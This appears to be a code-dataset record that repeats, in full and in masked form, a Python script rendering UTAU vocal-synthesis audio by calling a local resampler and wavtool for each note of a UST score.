PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=
PBM, VBR=VBR)
PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed +
PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) /
5)), NoteNum)
else:
PitchBendData = None
if PreUtterance - float(LocalOto['Overlap']) > PreviousLength // 2:
CorrectionRate = PreviousLength // 2 / (PreUtterance - float(
LocalOto['Overlap']))
BitedPreUtterance = PreUtterance * CorrectionRate
BitedOverlap = float(LocalOto['Overlap']) * CorrectionRate
else:
BitedPreUtterance = PreUtterance
BitedOverlap = float(LocalOto['Overlap'])
BitedSTP = PreUtterance - BitedPreUtterance
LengthRequire = Length + float(StartPoint
) - BitedSTP + BitedOverlap + 50
if LengthRequire < float(LocalOto['Consonant']):
LengthRequire = float(LocalOto['Consonant'])
LengthRequire = (LengthRequire // 50 * 50 if LengthRequire / 50 -
LengthRequire // 50 < 0.5 else math.ceil(LengthRequire / 50) * 50)
InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto['File'])
OutputFile = os.path.join(os.getcwd(), CACHE_PATH,
f'{FileOrder}_{Lyric}_{RandomString(6)}.wav')
Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH), InputFile,
OutputFile, midi2str(NoteNum), str(Velocity), Flags, LocalOto[
'Offset'], str(int(LengthRequire)), LocalOto['Consonant'],
LocalOto['Cutoff'], Intensity, Modulation, f'!{Tempo}' if
PitchBendData is not None else '', f'{PitchBendData}' if
PitchBendData is not None else '']
print(Parameters)
PreviousNote = NoteNum
PreviousLength = float(Length)
MSPassed += float(Length)
subprocess.call(Parameters)
if NIndex + 1 < len(UstParts) and UstParts[NIndex + 1
].lyric in OtoObject.keys():
NextOto = OtoObject[UstParts[NIndex + 1].lyric]
NextPreUtterance = float(NextOto['PreUtterance'])
NextOverlap = float(NextOto['Overlap'])
WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap
else:
WavtoolCorrection = PreUtterance
sign = '+' if WavtoolCorrection >= 0 else ''
WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.
join(os.getcwd(), OUTPUT_FILE), OutputFile, str(float(
StartPoint)), f'{Length}@{float(Tempo)}{sign}{WavtoolCorrection}'
] + [str(i) for i in Envelope]
subprocess.call(WavtoolParam)
<|reserved_special_token_1|>
from Modules.Pitch.Factory import MainFactory
from Modules.ToJson import Oto
from audiolazy.lazy_midi import midi2str
import utaupy
import string
import random
import math
import os, subprocess, shutil
def RandomString(Length):
Letters = string.ascii_lowercase
return ''.join(random.choice(Letters) for i in range(Length))
UST_FILE = 'filet.ust'
OTO_FILE = 'Voice\\NanaMio\\oto.ini'
VB_PATH = 'Voice\\NanaMio'
RESAMPLER_PATH = 'Resampler\\macres.exe'
WAVTOOL_PATH = 'Resampler\\wavtool-yawu.exe'
CACHE_PATH = 'Cache\\'
OUTPUT_FILE = 'temp.wav'
UstObject = utaupy.ust.load(UST_FILE)
OtoObject = Oto(OTO_FILE)
UstParts = UstObject.notes[4:28]
shutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))
os.mkdir(os.path.join(os.getcwd(), CACHE_PATH))
PreviousNote = -1
PreviousLength = 0
Tempo = round(float(UstObject.tempo))
MSPassed = 0
open(OUTPUT_FILE, 'w+')
for NIndex, Note in enumerate(UstParts):
print('prevnote', PreviousNote)
Rest = False
if Note.lyric in OtoObject.keys():
LocalOto = OtoObject[Note.lyric]
else:
LocalOto = None
Rest = True
Lyric = Note.lyric
Length = Note.length
NoteNum = Note.notenum
PreUtterance = float(LocalOto['PreUtterance']) if not Rest else 0
Velocity = Note.velocity
try:
StartPoint = Note.get_by_key('StartPoint')
except KeyError:
StartPoint = 0
try:
PBS = Note.pbs
except KeyError:
PBS = None
try:
PBW = Note['PBW'].split(',')
except KeyError:
PBW = None
try:
PBY = Note['PBY'].split(',')
for Index, Var in enumerate(PBY):
if Var == '':
PBY[Index] = '0'
except KeyError:
PBY = []
try:
PBM = Note.pbm
except KeyError:
PBM = []
try:
VBR = Note.get_by_key('VBR').split(',')
except KeyError:
VBR = None
try:
Flags = Note.get_by_key('Flags')
except KeyError:
Flags = '?'
try:
Modulation = Note.get_by_key('Modulation')
except KeyError:
Modulation = 100
try:
Intensity = Note.get_by_key('Intensity')
except KeyError:
Intensity = 100
try:
StartPoint = Note.get_by_key('StartPoint')
except KeyError:
StartPoint = 0
try:
Envelope = Note.get_by_key('Envelope')
Envelope = Envelope.replace('%', LocalOto['Overlap']).split(',')
except (KeyError, TypeError):
Envelope = ['0', '5', '35', '0', '100', '100', '0']
FileOrder = f'{NIndex:05}'
if Rest:
WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.
join(os.getcwd(), OUTPUT_FILE), OutputFile, str(MSPassed), str(
Length)] + ['0'] * 11
PreviousNote = -1
MSPassed += float(Length)
subprocess.call(WavtoolParam)
else:
if PreviousNote == -1:
PrevNote = NoteNum
else:
PrevNote = int(PreviousNote)
if PBS is not None and PBW is not None:
PB = MainFactory()
PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW,
PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=
PBM, VBR=VBR)
PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed +
PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) /
5)), NoteNum)
else:
PitchBendData = None
if PreUtterance - float(LocalOto['Overlap']) > PreviousLength // 2:
CorrectionRate = PreviousLength // 2 / (PreUtterance - float(
LocalOto['Overlap']))
BitedPreUtterance = PreUtterance * CorrectionRate
BitedOverlap = float(LocalOto['Overlap']) * CorrectionRate
else:
BitedPreUtterance = PreUtterance
BitedOverlap = float(LocalOto['Overlap'])
BitedSTP = PreUtterance - BitedPreUtterance
LengthRequire = Length + float(StartPoint
) - BitedSTP + BitedOverlap + 50
if LengthRequire < float(LocalOto['Consonant']):
LengthRequire = float(LocalOto['Consonant'])
LengthRequire = (LengthRequire // 50 * 50 if LengthRequire / 50 -
LengthRequire // 50 < 0.5 else math.ceil(LengthRequire / 50) * 50)
InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto['File'])
OutputFile = os.path.join(os.getcwd(), CACHE_PATH,
f'{FileOrder}_{Lyric}_{RandomString(6)}.wav')
Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH), InputFile,
OutputFile, midi2str(NoteNum), str(Velocity), Flags, LocalOto[
'Offset'], str(int(LengthRequire)), LocalOto['Consonant'],
LocalOto['Cutoff'], Intensity, Modulation, f'!{Tempo}' if
PitchBendData is not None else '', f'{PitchBendData}' if
PitchBendData is not None else '']
print(Parameters)
PreviousNote = NoteNum
PreviousLength = float(Length)
MSPassed += float(Length)
subprocess.call(Parameters)
if NIndex + 1 < len(UstParts) and UstParts[NIndex + 1
].lyric in OtoObject.keys():
NextOto = OtoObject[UstParts[NIndex + 1].lyric]
NextPreUtterance = float(NextOto['PreUtterance'])
NextOverlap = float(NextOto['Overlap'])
WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap
else:
WavtoolCorrection = PreUtterance
sign = '+' if WavtoolCorrection >= 0 else ''
WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.
join(os.getcwd(), OUTPUT_FILE), OutputFile, str(float(
StartPoint)), f'{Length}@{float(Tempo)}{sign}{WavtoolCorrection}'
] + [str(i) for i in Envelope]
subprocess.call(WavtoolParam)
<|reserved_special_token_1|>
from Modules.Pitch.Factory import MainFactory
from Modules.ToJson import Oto
from audiolazy.lazy_midi import midi2str
import utaupy
import string
import random
import math
import os, subprocess, shutil
def RandomString(Length):
Letters = string.ascii_lowercase
return ''.join(random.choice(Letters) for i in range(Length))
UST_FILE = "filet.ust"
OTO_FILE = "Voice\\NanaMio\\oto.ini"
VB_PATH = "Voice\\NanaMio"
RESAMPLER_PATH = "Resampler\\macres.exe"
WAVTOOL_PATH = "Resampler\\wavtool-yawu.exe"
CACHE_PATH = "Cache\\"
OUTPUT_FILE = "temp.wav"
UstObject = utaupy.ust.load(UST_FILE)
OtoObject = Oto(OTO_FILE)
UstParts = UstObject.notes[4:28]
shutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))
os.mkdir(os.path.join(os.getcwd(), CACHE_PATH))
PreviousNote = -1
PreviousLength = 0
Tempo = round(float(UstObject.tempo))
MSPassed = 0
open(OUTPUT_FILE, "w+")
for NIndex, Note in enumerate(UstParts):
print("prevnote", PreviousNote)
Rest = False
if Note.lyric in OtoObject.keys():
LocalOto = OtoObject[Note.lyric]
else:
LocalOto = None
Rest = True
Lyric = Note.lyric
Length = Note.length
NoteNum = Note.notenum
PreUtterance = float(LocalOto["PreUtterance"]) if not Rest else 0
Velocity = Note.velocity
# try:
# PreUtterance = Note.get_by_key("PreUtterance")
# except KeyError:
# PreUtterance = 0
try:
StartPoint = Note.get_by_key("StartPoint")
except KeyError:
StartPoint = 0
try:
PBS = Note.pbs
except KeyError:
PBS = None
try:
PBW = Note["PBW"].split(",")
except KeyError:
PBW = None
try:
PBY = Note["PBY"].split(",")
for Index, Var in enumerate(PBY):
if Var == "":
PBY[Index] = "0"
except KeyError:
PBY = []
try:
PBM = Note.pbm
except KeyError:
PBM = []
try:
VBR = Note.get_by_key("VBR").split(",")
except KeyError:
VBR = None
try:
Flags = Note.get_by_key("Flags")
except KeyError:
Flags = "?"
try:
Modulation = Note.get_by_key("Modulation")
except KeyError:
Modulation = 100
try:
Intensity = Note.get_by_key("Intensity")
except KeyError:
Intensity = 100
try:
StartPoint = Note.get_by_key("StartPoint")
except KeyError:
StartPoint = 0
try:
Envelope = Note.get_by_key("Envelope")
Envelope = Envelope.replace("%", LocalOto["Overlap"]).split(",")
except (KeyError, TypeError):
Envelope = ["0","5","35","0","100","100","0"]
FileOrder = f"{NIndex:05}"
if Rest:
# Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH),os.path.join(os.getcwd(), CACHE_PATH, SILENCE_FILE), os.path.join(os.getcwd(),f"{FileOrder}_Blank_{RandomString(6)}.wav"),utaupy.ust.notenum_as_abc(NoteNum),"100","?","0",str(int(Length//50 *50 if Length/50 - Length//50 < 0.5 else math.ceil(Length/50) * 50)),"0","0","100","0"]
# Segment = AudioSegment.silent(duration=Length)
WavtoolParam = [
os.path.join(os.getcwd(), WAVTOOL_PATH),
os.path.join(os.getcwd(), OUTPUT_FILE),
OutputFile,
str(MSPassed),
str(Length)
] + (["0"] * 11)
PreviousNote = -1
MSPassed += float(Length)
subprocess.call(WavtoolParam)
else:
if PreviousNote == -1:
PrevNote = NoteNum
else:
PrevNote = int(PreviousNote)
if PBS is not None and PBW is not None:
PB = MainFactory()
PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW, PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=PBM, VBR=VBR)
PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed + PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) / 5)), NoteNum)
else:
PitchBendData = None
# Bite Correction (The previous note should last for half the length before overlap)
if PreUtterance - float(LocalOto["Overlap"]) > (PreviousLength // 2):
CorrectionRate = (PreviousLength // 2) / (PreUtterance - float(LocalOto["Overlap"]))
BitedPreUtterance = PreUtterance * CorrectionRate
BitedOverlap = float(LocalOto["Overlap"]) * CorrectionRate
else:
BitedPreUtterance = PreUtterance
BitedOverlap = float(LocalOto["Overlap"])
BitedSTP = PreUtterance - BitedPreUtterance
LengthRequire = Length + float(StartPoint) - BitedSTP + BitedOverlap + 50
if LengthRequire < float(LocalOto["Consonant"]):
LengthRequire = float(LocalOto["Consonant"])
LengthRequire = LengthRequire//50 *50 if LengthRequire/50 - LengthRequire//50 < 0.5 else math.ceil(LengthRequire/50) * 50
InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto["File"])
OutputFile = os.path.join(os.getcwd(), CACHE_PATH, f"{FileOrder}_{Lyric}_{RandomString(6)}.wav")
Parameters = [
os.path.join(os.getcwd(), RESAMPLER_PATH),
InputFile,
OutputFile,
midi2str(NoteNum),
str(Velocity),
Flags,
LocalOto["Offset"],
str(int(LengthRequire)),
LocalOto["Consonant"],
LocalOto["Cutoff"],
Intensity,
Modulation,
f"!{Tempo}" if PitchBendData is not None else "",
f"{PitchBendData}" if PitchBendData is not None else ""
]
print(Parameters)
PreviousNote = NoteNum
PreviousLength = float(Length)
MSPassed += float(Length)
subprocess.call(Parameters)
if NIndex + 1 < len(UstParts) and UstParts[NIndex+1].lyric in OtoObject.keys():
NextOto = OtoObject[UstParts[NIndex+1].lyric]
NextPreUtterance = float(NextOto["PreUtterance"])
NextOverlap = float(NextOto["Overlap"])
WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap
else:
WavtoolCorrection = PreUtterance
sign = "+" if WavtoolCorrection >= 0 else ""
WavtoolParam = [
os.path.join(os.getcwd(), WAVTOOL_PATH),
os.path.join(os.getcwd(), OUTPUT_FILE),
OutputFile,
str(float(StartPoint)),
f"{Length}@{float(Tempo)}{sign}{WavtoolCorrection}"
] + [str(i) for i in Envelope]
subprocess.call(WavtoolParam)
|
flexible
|
{
"blob_id": "ce11a5c2fbd6e0ea0f8ab293dc53afd07a18c25c",
"index": 6160,
"step-1": "<mask token>\n\n\ndef RandomString(Length):\n Letters = string.ascii_lowercase\n return ''.join(random.choice(Letters) for i in range(Length))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef RandomString(Length):\n Letters = string.ascii_lowercase\n return ''.join(random.choice(Letters) for i in range(Length))\n\n\n<mask token>\nshutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))\nos.mkdir(os.path.join(os.getcwd(), CACHE_PATH))\n<mask token>\nopen(OUTPUT_FILE, 'w+')\nfor NIndex, Note in enumerate(UstParts):\n print('prevnote', PreviousNote)\n Rest = False\n if Note.lyric in OtoObject.keys():\n LocalOto = OtoObject[Note.lyric]\n else:\n LocalOto = None\n Rest = True\n Lyric = Note.lyric\n Length = Note.length\n NoteNum = Note.notenum\n PreUtterance = float(LocalOto['PreUtterance']) if not Rest else 0\n Velocity = Note.velocity\n try:\n StartPoint = Note.get_by_key('StartPoint')\n except KeyError:\n StartPoint = 0\n try:\n PBS = Note.pbs\n except KeyError:\n PBS = None\n try:\n PBW = Note['PBW'].split(',')\n except KeyError:\n PBW = None\n try:\n PBY = Note['PBY'].split(',')\n for Index, Var in enumerate(PBY):\n if Var == '':\n PBY[Index] = '0'\n except KeyError:\n PBY = []\n try:\n PBM = Note.pbm\n except KeyError:\n PBM = []\n try:\n VBR = Note.get_by_key('VBR').split(',')\n except KeyError:\n VBR = None\n try:\n Flags = Note.get_by_key('Flags')\n except KeyError:\n Flags = '?'\n try:\n Modulation = Note.get_by_key('Modulation')\n except KeyError:\n Modulation = 100\n try:\n Intensity = Note.get_by_key('Intensity')\n except KeyError:\n Intensity = 100\n try:\n StartPoint = Note.get_by_key('StartPoint')\n except KeyError:\n StartPoint = 0\n try:\n Envelope = Note.get_by_key('Envelope')\n Envelope = Envelope.replace('%', LocalOto['Overlap']).split(',')\n except (KeyError, TypeError):\n Envelope = ['0', '5', '35', '0', '100', '100', '0']\n FileOrder = f'{NIndex:05}'\n if Rest:\n WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.\n join(os.getcwd(), OUTPUT_FILE), OutputFile, str(MSPassed), str(\n Length)] + ['0'] * 11\n PreviousNote = -1\n MSPassed += float(Length)\n subprocess.call(WavtoolParam)\n else:\n if PreviousNote == -1:\n PrevNote = NoteNum\n else:\n PrevNote = int(PreviousNote)\n if PBS is not None and PBW is not None:\n PB = MainFactory()\n PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW,\n PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=\n PBM, VBR=VBR)\n PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed +\n PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) / \n 5)), NoteNum)\n else:\n PitchBendData = None\n if PreUtterance - float(LocalOto['Overlap']) > PreviousLength // 2:\n CorrectionRate = PreviousLength // 2 / (PreUtterance - float(\n LocalOto['Overlap']))\n BitedPreUtterance = PreUtterance * CorrectionRate\n BitedOverlap = float(LocalOto['Overlap']) * CorrectionRate\n else:\n BitedPreUtterance = PreUtterance\n BitedOverlap = float(LocalOto['Overlap'])\n BitedSTP = PreUtterance - BitedPreUtterance\n LengthRequire = Length + float(StartPoint\n ) - BitedSTP + BitedOverlap + 50\n if LengthRequire < float(LocalOto['Consonant']):\n LengthRequire = float(LocalOto['Consonant'])\n LengthRequire = (LengthRequire // 50 * 50 if LengthRequire / 50 - \n LengthRequire // 50 < 0.5 else math.ceil(LengthRequire / 50) * 50)\n InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto['File'])\n OutputFile = os.path.join(os.getcwd(), CACHE_PATH,\n f'{FileOrder}_{Lyric}_{RandomString(6)}.wav')\n Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH), InputFile,\n OutputFile, midi2str(NoteNum), str(Velocity), Flags, LocalOto[\n 'Offset'], str(int(LengthRequire)), LocalOto['Consonant'],\n LocalOto['Cutoff'], Intensity, Modulation, f'!{Tempo}' if \n PitchBendData is not None else '', f'{PitchBendData}' if \n PitchBendData is not None else '']\n print(Parameters)\n PreviousNote = NoteNum\n PreviousLength = float(Length)\n MSPassed += float(Length)\n subprocess.call(Parameters)\n if NIndex + 1 < len(UstParts) and UstParts[NIndex + 1\n ].lyric in OtoObject.keys():\n NextOto = OtoObject[UstParts[NIndex + 1].lyric]\n NextPreUtterance = float(NextOto['PreUtterance'])\n NextOverlap = float(NextOto['Overlap'])\n WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap\n else:\n WavtoolCorrection = PreUtterance\n sign = '+' if WavtoolCorrection >= 0 else ''\n WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.\n join(os.getcwd(), OUTPUT_FILE), OutputFile, str(float(\n StartPoint)), f'{Length}@{float(Tempo)}{sign}{WavtoolCorrection}'\n ] + [str(i) for i in Envelope]\n subprocess.call(WavtoolParam)\n",
"step-3": "<mask token>\n\n\ndef RandomString(Length):\n Letters = string.ascii_lowercase\n return ''.join(random.choice(Letters) for i in range(Length))\n\n\nUST_FILE = 'filet.ust'\nOTO_FILE = 'Voice\\\\NanaMio\\\\oto.ini'\nVB_PATH = 'Voice\\\\NanaMio'\nRESAMPLER_PATH = 'Resampler\\\\macres.exe'\nWAVTOOL_PATH = 'Resampler\\\\wavtool-yawu.exe'\nCACHE_PATH = 'Cache\\\\'\nOUTPUT_FILE = 'temp.wav'\nUstObject = utaupy.ust.load(UST_FILE)\nOtoObject = Oto(OTO_FILE)\nUstParts = UstObject.notes[4:28]\nshutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))\nos.mkdir(os.path.join(os.getcwd(), CACHE_PATH))\nPreviousNote = -1\nPreviousLength = 0\nTempo = round(float(UstObject.tempo))\nMSPassed = 0\nopen(OUTPUT_FILE, 'w+')\nfor NIndex, Note in enumerate(UstParts):\n print('prevnote', PreviousNote)\n Rest = False\n if Note.lyric in OtoObject.keys():\n LocalOto = OtoObject[Note.lyric]\n else:\n LocalOto = None\n Rest = True\n Lyric = Note.lyric\n Length = Note.length\n NoteNum = Note.notenum\n PreUtterance = float(LocalOto['PreUtterance']) if not Rest else 0\n Velocity = Note.velocity\n try:\n StartPoint = Note.get_by_key('StartPoint')\n except KeyError:\n StartPoint = 0\n try:\n PBS = Note.pbs\n except KeyError:\n PBS = None\n try:\n PBW = Note['PBW'].split(',')\n except KeyError:\n PBW = None\n try:\n PBY = Note['PBY'].split(',')\n for Index, Var in enumerate(PBY):\n if Var == '':\n PBY[Index] = '0'\n except KeyError:\n PBY = []\n try:\n PBM = Note.pbm\n except KeyError:\n PBM = []\n try:\n VBR = Note.get_by_key('VBR').split(',')\n except KeyError:\n VBR = None\n try:\n Flags = Note.get_by_key('Flags')\n except KeyError:\n Flags = '?'\n try:\n Modulation = Note.get_by_key('Modulation')\n except KeyError:\n Modulation = 100\n try:\n Intensity = Note.get_by_key('Intensity')\n except KeyError:\n Intensity = 100\n try:\n StartPoint = Note.get_by_key('StartPoint')\n except KeyError:\n StartPoint = 0\n try:\n Envelope = Note.get_by_key('Envelope')\n Envelope = Envelope.replace('%', LocalOto['Overlap']).split(',')\n except (KeyError, TypeError):\n Envelope = ['0', '5', '35', '0', '100', '100', '0']\n FileOrder = f'{NIndex:05}'\n if Rest:\n WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.\n join(os.getcwd(), OUTPUT_FILE), OutputFile, str(MSPassed), str(\n Length)] + ['0'] * 11\n PreviousNote = -1\n MSPassed += float(Length)\n subprocess.call(WavtoolParam)\n else:\n if PreviousNote == -1:\n PrevNote = NoteNum\n else:\n PrevNote = int(PreviousNote)\n if PBS is not None and PBW is not None:\n PB = MainFactory()\n PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW,\n PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=\n PBM, VBR=VBR)\n PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed +\n PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) / \n 5)), NoteNum)\n else:\n PitchBendData = None\n if PreUtterance - float(LocalOto['Overlap']) > PreviousLength // 2:\n CorrectionRate = PreviousLength // 2 / (PreUtterance - float(\n LocalOto['Overlap']))\n BitedPreUtterance = PreUtterance * CorrectionRate\n BitedOverlap = float(LocalOto['Overlap']) * CorrectionRate\n else:\n BitedPreUtterance = PreUtterance\n BitedOverlap = float(LocalOto['Overlap'])\n BitedSTP = PreUtterance - BitedPreUtterance\n LengthRequire = Length + float(StartPoint\n ) - BitedSTP + BitedOverlap + 50\n if LengthRequire < float(LocalOto['Consonant']):\n LengthRequire = float(LocalOto['Consonant'])\n LengthRequire = (LengthRequire // 50 * 50 if LengthRequire / 50 - \n LengthRequire // 50 < 0.5 else math.ceil(LengthRequire / 50) * 50)\n InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto['File'])\n OutputFile = os.path.join(os.getcwd(), CACHE_PATH,\n f'{FileOrder}_{Lyric}_{RandomString(6)}.wav')\n Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH), InputFile,\n OutputFile, midi2str(NoteNum), str(Velocity), Flags, LocalOto[\n 'Offset'], str(int(LengthRequire)), LocalOto['Consonant'],\n LocalOto['Cutoff'], Intensity, Modulation, f'!{Tempo}' if \n PitchBendData is not None else '', f'{PitchBendData}' if \n PitchBendData is not None else '']\n print(Parameters)\n PreviousNote = NoteNum\n PreviousLength = float(Length)\n MSPassed += float(Length)\n subprocess.call(Parameters)\n if NIndex + 1 < len(UstParts) and UstParts[NIndex + 1\n ].lyric in OtoObject.keys():\n NextOto = OtoObject[UstParts[NIndex + 1].lyric]\n NextPreUtterance = float(NextOto['PreUtterance'])\n NextOverlap = float(NextOto['Overlap'])\n WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap\n else:\n WavtoolCorrection = PreUtterance\n sign = '+' if WavtoolCorrection >= 0 else ''\n WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.\n join(os.getcwd(), OUTPUT_FILE), OutputFile, str(float(\n StartPoint)), f'{Length}@{float(Tempo)}{sign}{WavtoolCorrection}'\n ] + [str(i) for i in Envelope]\n subprocess.call(WavtoolParam)\n",
"step-4": "from Modules.Pitch.Factory import MainFactory\nfrom Modules.ToJson import Oto\nfrom audiolazy.lazy_midi import midi2str\nimport utaupy\nimport string\nimport random\nimport math\nimport os, subprocess, shutil\n\n\ndef RandomString(Length):\n Letters = string.ascii_lowercase\n return ''.join(random.choice(Letters) for i in range(Length))\n\n\nUST_FILE = 'filet.ust'\nOTO_FILE = 'Voice\\\\NanaMio\\\\oto.ini'\nVB_PATH = 'Voice\\\\NanaMio'\nRESAMPLER_PATH = 'Resampler\\\\macres.exe'\nWAVTOOL_PATH = 'Resampler\\\\wavtool-yawu.exe'\nCACHE_PATH = 'Cache\\\\'\nOUTPUT_FILE = 'temp.wav'\nUstObject = utaupy.ust.load(UST_FILE)\nOtoObject = Oto(OTO_FILE)\nUstParts = UstObject.notes[4:28]\nshutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))\nos.mkdir(os.path.join(os.getcwd(), CACHE_PATH))\nPreviousNote = -1\nPreviousLength = 0\nTempo = round(float(UstObject.tempo))\nMSPassed = 0\nopen(OUTPUT_FILE, 'w+')\nfor NIndex, Note in enumerate(UstParts):\n print('prevnote', PreviousNote)\n Rest = False\n if Note.lyric in OtoObject.keys():\n LocalOto = OtoObject[Note.lyric]\n else:\n LocalOto = None\n Rest = True\n Lyric = Note.lyric\n Length = Note.length\n NoteNum = Note.notenum\n PreUtterance = float(LocalOto['PreUtterance']) if not Rest else 0\n Velocity = Note.velocity\n try:\n StartPoint = Note.get_by_key('StartPoint')\n except KeyError:\n StartPoint = 0\n try:\n PBS = Note.pbs\n except KeyError:\n PBS = None\n try:\n PBW = Note['PBW'].split(',')\n except KeyError:\n PBW = None\n try:\n PBY = Note['PBY'].split(',')\n for Index, Var in enumerate(PBY):\n if Var == '':\n PBY[Index] = '0'\n except KeyError:\n PBY = []\n try:\n PBM = Note.pbm\n except KeyError:\n PBM = []\n try:\n VBR = Note.get_by_key('VBR').split(',')\n except KeyError:\n VBR = None\n try:\n Flags = Note.get_by_key('Flags')\n except KeyError:\n Flags = '?'\n try:\n Modulation = Note.get_by_key('Modulation')\n except KeyError:\n Modulation = 100\n try:\n Intensity = Note.get_by_key('Intensity')\n except KeyError:\n Intensity = 100\n try:\n StartPoint = Note.get_by_key('StartPoint')\n except KeyError:\n StartPoint = 0\n try:\n Envelope = Note.get_by_key('Envelope')\n Envelope = Envelope.replace('%', LocalOto['Overlap']).split(',')\n except (KeyError, TypeError):\n Envelope = ['0', '5', '35', '0', '100', '100', '0']\n FileOrder = f'{NIndex:05}'\n if Rest:\n WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.\n join(os.getcwd(), OUTPUT_FILE), OutputFile, str(MSPassed), str(\n Length)] + ['0'] * 11\n PreviousNote = -1\n MSPassed += float(Length)\n subprocess.call(WavtoolParam)\n else:\n if PreviousNote == -1:\n PrevNote = NoteNum\n else:\n PrevNote = int(PreviousNote)\n if PBS is not None and PBW is not None:\n PB = MainFactory()\n PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW,\n PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=\n PBM, VBR=VBR)\n PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed +\n PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) / \n 5)), NoteNum)\n else:\n PitchBendData = None\n if PreUtterance - float(LocalOto['Overlap']) > PreviousLength // 2:\n CorrectionRate = PreviousLength // 2 / (PreUtterance - float(\n LocalOto['Overlap']))\n BitedPreUtterance = PreUtterance * CorrectionRate\n BitedOverlap = float(LocalOto['Overlap']) * CorrectionRate\n else:\n BitedPreUtterance = PreUtterance\n BitedOverlap = float(LocalOto['Overlap'])\n BitedSTP = PreUtterance - BitedPreUtterance\n LengthRequire = Length + float(StartPoint\n ) - BitedSTP + BitedOverlap + 50\n if LengthRequire < float(LocalOto['Consonant']):\n LengthRequire = float(LocalOto['Consonant'])\n LengthRequire = (LengthRequire // 50 * 50 if LengthRequire / 50 - \n LengthRequire // 50 < 0.5 else math.ceil(LengthRequire / 50) * 50)\n InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto['File'])\n OutputFile = os.path.join(os.getcwd(), CACHE_PATH,\n f'{FileOrder}_{Lyric}_{RandomString(6)}.wav')\n Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH), InputFile,\n OutputFile, midi2str(NoteNum), str(Velocity), Flags, LocalOto[\n 'Offset'], str(int(LengthRequire)), LocalOto['Consonant'],\n LocalOto['Cutoff'], Intensity, Modulation, f'!{Tempo}' if \n PitchBendData is not None else '', f'{PitchBendData}' if \n PitchBendData is not None else '']\n print(Parameters)\n PreviousNote = NoteNum\n PreviousLength = float(Length)\n MSPassed += float(Length)\n subprocess.call(Parameters)\n if NIndex + 1 < len(UstParts) and UstParts[NIndex + 1\n ].lyric in OtoObject.keys():\n NextOto = OtoObject[UstParts[NIndex + 1].lyric]\n NextPreUtterance = float(NextOto['PreUtterance'])\n NextOverlap = float(NextOto['Overlap'])\n WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap\n else:\n WavtoolCorrection = PreUtterance\n sign = '+' if WavtoolCorrection >= 0 else ''\n WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.\n join(os.getcwd(), OUTPUT_FILE), OutputFile, str(float(\n StartPoint)), f'{Length}@{float(Tempo)}{sign}{WavtoolCorrection}'\n ] + [str(i) for i in Envelope]\n subprocess.call(WavtoolParam)\n",
